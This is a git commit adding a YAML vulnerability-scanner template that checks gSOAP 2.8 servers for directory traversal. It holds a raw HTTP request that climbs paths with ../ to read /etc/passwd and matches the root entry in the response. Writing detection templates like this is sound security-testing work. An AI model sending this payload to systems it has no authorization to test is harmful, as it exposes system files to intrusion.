Merge pull request #2580 from Akokonunes/patch-29

Create gSOAP-LFl.yaml
patch-1
Prince Chaddha 2021-09-06 17:36:18 +05:30 committed by GitHub
commit 4075664390
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: gsoap-lfi
info:
name: gSOAP 2.8 - Directory Traversal
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/47653
tags: gsoap,lfi
requests:
- raw:
- |
GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200